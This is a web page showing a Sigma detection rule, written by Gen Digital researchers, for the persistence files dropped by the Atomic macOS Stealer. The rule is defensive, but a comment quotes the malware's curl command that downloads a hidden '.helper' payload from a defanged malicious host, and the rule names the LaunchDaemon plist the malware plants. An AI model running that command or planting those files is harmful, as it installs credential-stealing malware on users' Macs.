Atomic MacOS Stealer - Persistence Indicators
Detects creation of persistence artifacts placed by Atomic MacOS Stealer in macOS systems. Recent Atomic MacOS Stealer variants have been observed dropping these to maintain persistent access after compromise.
Sigma rule (View on GitHub)
1title: Atomic MacOS Stealer - Persistence Indicators
2id: e710a880-1f18-4417-b6a0-b5afdf7e3023
3status: experimental
4description: |
5 Detects creation of persistence artifacts placed by Atomic MacOS Stealer in macOS systems. Recent Atomic MacOS Stealer variants have been observed dropping these to maintain persistent access after compromise.
6references:
7 - https://moonlock.com/amos-backdoor-persistent-access
8 - https://github.com/bobby-tablez/TTP-Threat-Feeds/blob/45398914e631f8372c3a9fbcd339ff65ffff1b17/results/2025/10/20251001-161956-trendmicro-atomic-macos-stealer-(amos).yml#L44
9author: Jason Phang Vern - Onn, Robbin Ooi Zhen Heng (Gen Digital)
10date: 2025-11-22
11tags:
12 - attack.persistence
13 - attack.privilege-escalation
14 - attack.defense-evasion
15 - attack.t1564.001
16 - attack.t1543.004
17 - detection.emerging-threats
18logsource:
19 category: file_event
20 product: macos
21detection:
22 selection_user_helper:
23 # sh -c curl -o '/Users/<username>/.helper' hxxps://halesmp[.]com/zxc/app
24 Image|endswith: '/curl'
25 TargetFilename|startswith: '/Users/'
26 TargetFilename|endswith: '.helper'
27 selection_launchdaemon:
28 TargetFilename: '/Library/LaunchDaemons/com.finder.helper.plist'
29 condition: 1 of selection_*
30falsepositives:
31 - Unknown
32level: high
References
-
-
Threat feeds designed to extract adversarial TTPs and IOCs, using: ✨AI✨ - bobby-tablez/TTP-Threat-Feeds
Read More
Related rules
- Potential PrintNightmare Exploitation Attempt
- Windows Spooler Service Suspicious Binary Load
- Turla Group Commands May 2020
- APT27 - Emissary Panda Activity
- Commvault QLogin with PublicSharingUser and GUID Password (CVE-2025-57788)